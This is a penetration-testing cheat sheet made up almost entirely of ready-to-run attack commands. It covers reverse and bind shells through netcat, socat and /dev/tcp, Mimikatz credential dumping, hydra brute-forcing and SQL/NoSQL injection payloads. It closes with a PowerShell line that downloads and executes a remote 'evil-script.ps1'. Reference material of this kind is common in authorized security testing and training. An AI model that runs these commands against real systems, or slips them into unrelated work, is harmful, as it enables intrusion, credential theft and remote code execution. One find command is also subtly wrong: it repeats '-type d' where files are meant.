Quick reference for penetration testing. Search the page and find what you need.

  1. Service Discovery
  2. Service Enumeration
  3. Password Attacks
  4. Shells
  5. File Transfer
  6. SQL/NoSQL Injection
  7. Shell Injection
  8. Port Forwarding
  9. Linux Privilege Escalation
  10. Windows Privilege Escalation

Service Discovery

Nmap

# Ping scan
nmap -v -sn 10.1.1.0/24

# TCP scan:
nmap -v -sV -p- 10.1.1.1 --open

# UDP scan:
nmap -v -sV -sU --top-ports 50 10.1.1.1

# Lan scan
nmap -v -sV --top-ports 30 10.1.1.0/24 --open

Service Enumeration

Grab banner

nmap -sV -p 80 10.1.1.1
ncat -nv 10.1.1.1 80

Samba

# Find hosts
nbtscan -r 10.1.1.0/24

# List shares
smbclient -L 10.1.1.1

# Scripts
enum4linux 10.1.1.1

# Explore a share
smbclient -U administrator //10.1.1.1/C$

HTTP

# Scanners
nikto -h http://10.1.1.1/ -p 80

# Bruteforce
gobuster dir -u http://10.1.1.1/ -t 100 -w WORDLIST -x php,txt
gobuster dir -u http://10.1.1.1/ -t 100 -w WORDLIST -c "PHPSESSID=SESSID"
dirbuster

# Screenshots with cutycapt
for u in $(cat urls.txt); do cutycapt --url=$u --out=$u.png; done

# Wordpress
wpscan --url example.com --enumerate ap,at,cb,dbe -o output.txt -f cli-no-color
/usr/share/seclists/Web-Shells/WordPress/plugin-shell.php

DNS

# Zone transfer
host -l domain.com dns.domain.com
dnsrecon -d domain.com -t axfr

Password Attacks

Wordlists

# Create wordlist from website
cewl example.com -w words.txt -d 3
cewl example.com -w words.txt -H "Cookie:PHPSESSID=SESSID"

# Apply word mutations
john --wordlist=example_com_pwd.txt --rules --stdout > example_com_rules.txt

Bruteforce Tools

# HTTP Auth
medusa -h 10.1.1.1 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin-panel

# HTTP POST
hydra 10.1.1.1 http-form-post -l admin -P /usr/share/wordlists/rockyou.txt "/login.php:user=^USER^&password=^PASS^:Login failed" -f

# SSH
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.1.1.1 -f

Mimikatz

mimikatz # privilege::debug

# Retrieve SAM
mimikatz # token::elevate
mimikatz # lsadump::sam

# Retrieve logon passwords
mimikatz # sekurlsa::logonpasswords

# Retrieve tickets
mimikatz # sekurlsa::tickets

# Export kerberos tickets
kerberos::list /export

# Obtain kerberos ticket with NTLM hash
sekurlsa::pth /user:admin /domain:example.com /ntlm:NTLM_HASH /run:powershell.exe

Cracking Tools

# Bruteforce NTLM with john
john hashes.txt --format=NT

# Bruteforce Linux hashes with john
unshadow /etc/passwd /etc/shadow > combined.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

# Cracking kerberos tickets
python /usr/share/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

Shells

Netcat

# Bind shell
nc -nvlp 4567 -e /bin/bash

# Listener
nc -nvlp 444

# Reverse shell with -e option
nc -nv 10.1.1.1 444 -e /bin/bash

# Reverse shell without -e option
mkfifo /tmp/f; nc 10.1.1.1 444 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

Socat

# Listener
socat file:`tty`,raw,echo=0 tcp-listen:444
socat TCP4-LISTEN:4567 STDOUT

# Reverse shell
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.1.1.1:444
socat TCP4:10.1.1.1:4567 EXEC:/bin/bash

Bash

# Reverse
bash -i >& /dev/tcp/10.1.1.1/444 0>&1

Interactive Shells

# Python pty module
python -c "import pty; pty.spawn('/bin/bash')"

### Full tty upgrade from netcat
# On target
python -c "import pty; pty.spawn('/bin/bash')"
Ctrl-Z

# On Kali
stty raw -echo
fg

# On target
reset
export SHELL=bash
export TERM=xterm-256color	# Find on Kali with 'echo $TERM'
stty rows 24 columns 80		# Find on Kali with 'stty -a'

File Transfer

Netcat

# Receiver
nc -nlp 8080 > file.zip

# Sender
cat file.zip | nc 10.1.1.1 8080
nc 10.1.1.1 < file.zip

Socat

# Sender
socat TCP4-LISTEN:8080,fork file:file.zip

# Receiver
socat TCP4:10.1.1.1:8080 file:file.zip,create

HTTP

# Start HTTP server
python -m SimpleHTTPServer 80
python3 -m http.server 80

# Download from Linux
wget http://10.1.1.1/file.exe
curl http://10.1.1.1/file.exe -o file.exe

# Download from Windows powershell
Invoke-WebRequest -Uri http://10.1.1.1/file.exe -OutFile file.exe
(New-Object System.Net.WebClient).DownloadFile('http://10.1.1.1/file.exe','C:\Windows\Temp\file.exe')

# Build wget.vbs in non interactive Windows shells
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

wget.vbs http://10.1.1.1/file.exe file.exe

Encoders

# exe2hex
exe2hex -x file.exe -p file.cmd

# Base64
cat file.exe | base64 -w0
echo -n BASE64_STRING | base64 -d > file.exe

SQL Injection

Variables

@@hostname
@@version
@@tmpdir
@@version_compile_machine
CURRENT_USER()

Authentication Bypass

# MySQL
x' OR 1=1
x' OR 1=1 LIMIT 0,1

# NoSQL (Mongo)
username[$ne]=wrong&password[$ne]=wrong

Database Enumeration

# Select table names
SELECT table_name FROM information_schema.tables

# Select column names
SELECT column_name FROM information_schema.columns WHERE table_name='users'

# UNION SELECT
x' ORDER BY 5
x' UNION ALL SELECT 1,2,3,4,5

# NoSQL Retrieve username and password one character at a time
username[$regex]=a.*&password[$ne]=wrong
username[$regex]=ad.*&password[$ne]=wrong

Shell Injection

c1 ; c2       # sequence
c1 | c2       # pipe
c1 `c2`       # c2 output as argument for c1
c1 $(c2)      # c2 output as argument for c1
c1 && c2      # c2 if c1
c1 || c2      # c2 if not c1
c1 > f1       # c1 outputs on f1

Port Forwarding

Linux Machines

# Local port forwarding
ssh -N -L 0.0.0.0:4455:10.1.1.1:445 admin@10.1.1.1

# Remote port forwarding
ssh -N -R 10.10.1.1:4455:127.0.0.1:445 attacker@10.10.1.1

# Socks5 with SSH
ssh -N -D 127.0.0.1:8888 admin@10.1.1.1

Windows Machines

# plink in an interactive shell
plink.exe -ssh -L 0.0.0.0:4444:10.1.1.1:445 admin@10.10.1.1
plink.exe -ssh -R 10.10.1.1:4444:127.0.0.1:445 attacker@10.10.1.1
plink.exe -ssh -D 127.0.0.1:8080 admin@10.10.1.1

# plink in non interactive shell
cmd.exe /c echo y | plink.exe -ssh -l admin -pw password -R 10.10.1.1:4444:127.0.0.1:445 attacker@10.10.1.1

# netsh local port forwarding
netsh interface portproxy add v4tov4 listenaddress=10.1.1.1 listenport:4444 connectaddress:10.1.1.1 connectport:3306
netsh advfirewall firewall add rule name="4444_to_3306" protocol=TCP dir=in localip=127.0.0.1 localport=3306 action=allow

Linux Privilege Escalation

System Enumeration

System

# OS version
uname -a
lsb_release -a
cat /etc/issue

# Environment
env

# Hostname
hostname

Users and groups

# Current user and groups
whoami
id

# All users and groups
cat /etc/passwd
cat /etc/group

Network

# IP
ifconfig
ip a

# Network connections
netstat -ant
ss -lnt

# Routing table
route -n

# Finding iptables-save files
grep -Hs iptables /etc/*

Processes and scheduled tasks

# List all processes
ps aux

# List scheduled tasks
ls -la /etc/cron*
cat /etc/crontab

Drives

cat /etc/fstab
mount -l
lsblk

Software

# Installed software
dpkg -l

Weak Permissions

# Find all writeable directories
find / -writeable -type d 2>/dev/null

# Find all writeable files
find / -writeable -type d 2>/dev/null

# Find all SUID files
find / -perm -u=s -type f 2>/dev/null

Windows Privilege Escalation

System Enumeration

System:

# OS version and arch
systeminfo

# Insalled patches
wmic qfe
wmic qfe get Caption, Description, HotFixID, InstalledOn

# Environment
set

# Hostname
hostname

Users:

# Logged account
echo %username%
whoami

# Groups and permissions
whoami /group
whoami /priv

# List users and get user detail
net users
net user john

# List groups and group memberships
net localgroup
net localgroup Administrators

Network:

# Network interfaces
ipconfig /all

# Routes
route print

# Arp cache
arp /a

# Firewall state and configuration
netsh firewall show state
netsh firewall show config
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

# List current network connections
netstat /ano

Software

# Installed Software
wmic product get name, version, vendor

Drives

# List mounted and unmounted drives
mountvol

Processes and scheduled tasks

# Scheduled tasks
schtasks /query /fo LIST /v

# Which process is running which service
tasklist /SVC

Passwords Mining

# Look for these unattended files
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

Weak Permissions

# Find word writeable files
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

# Check file ACL
icacls "C:\Program Files\Install\Path\file.exe"

Registry keys

# AlwaysInstallElevated
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Powershell

# Execute powershell script remotely
powershell.exe -exec bypass -C "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/evil-script.ps1')"